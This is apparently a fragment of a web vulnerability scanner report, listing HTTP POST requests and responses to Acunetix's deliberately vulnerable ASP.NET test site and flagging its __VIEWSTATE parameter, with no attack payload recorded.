Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8373&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACpfIrV2ghkZGRlEIKc0yrfIgcDIdzHvIeaD3Cuxg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKP0umvCgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDhR%2BotDHhbB%2B1jjhbWn3GID6jFa
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:46 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACpfIrV2ghkZGRlEIKc0yrfIgcDIdzHvIeaD3Cuxg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP0umvCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDhR+otDHhbB+1jjhbWn3GID6jFa" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:White" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8381&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAD3z9Pb2ghkZGTaqWOCglSkyfA2Wn%2BWymOBLQHgmA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpw4aTAwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGIfhQOJGoVoCT4y3%2BtAGB%2FEU02S
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:49 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAD3z9Pb2ghkZGTaqWOCglSkyfA2Wn+WymOBLQHgmA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpw4aTAwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGIfhQOJGoVoCT4y3+tAGB/EU02S" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:White" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
